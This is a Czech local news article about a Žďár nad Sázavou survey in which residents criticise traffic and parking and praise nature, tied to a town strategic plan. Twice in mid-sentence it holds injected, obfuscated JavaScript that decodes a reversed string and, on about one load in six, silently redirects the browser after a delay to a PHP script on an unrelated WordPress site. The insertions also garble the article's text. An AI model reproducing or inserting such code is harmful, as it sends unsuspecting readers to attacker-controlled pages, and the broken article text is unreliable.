Rainbow page separator

Žďárským respondentům vadí doprava a pochvalují si přírodu

Pátek, 25. prosince 2015

nám. Republiky Žďár nad Sázavou

Žďár nad Sázavou / Celkem 607 respondentů se vyjádřilo v dotazníku žďárské radnice na téma, co se jim ve městě nejvíce líbí a co jim naopak vadí. Z dotazníkového šetření, které bylo vypsáno pro potřeby tvorby strategického plánu rozvoje města, vyplynulo, že obyvatelé se nejvíce ohrazovali vůči dopravě ve městě (21,3% respondentů) a oceňovali místní přírodu (54%). Mezi nejčastěji jmenované nedostatky se zařadil také nedostatek parkovacích míst (16,9%), nedostatek odpadkových košů a nepořádek ve městě (6,5%), nezodpovědní pejskaři (6%), neuspokojivý stav a počet dětských hřišť (5,1%), hluk, a ["\'///\'="];["\'///\'="]; };["\'//\'="]}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to hlavně v noci, (4,6%), bezdomovci (4,4%), náměstí (3,9%) nebo Romové (2,3%). Kromě přírody si obyvatelé Žďáru pochvalují kostel svatého Jana Nepomuckého (27,5%), spor["\'///\'="];["\'///\'="]; };["\'//\'="]}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tovní vyžití (12,1%), společenské a kulturní vyžití (12%), životní prostředí (6,5%), zámek (4,2%) či Pilskou nádrž (2,8%). Strategický plán rozvoje města má být zpracován ve výhledu do roku 2028 a akční plán, který bude jeho součástí, do roku 2022. „Analytická část má být v průběhu ledna připomínkována a poté dojde na konkrétní návrhovou část. V průběhu prvního pololetí příštího roku bude strategie dopracována a schválena, ale ještě předtím ji představíme veřejnosti a obyvatelé se k ní budou moci vyjádřit,“ sdělil žďárský starosta Zdeněk Navrátil.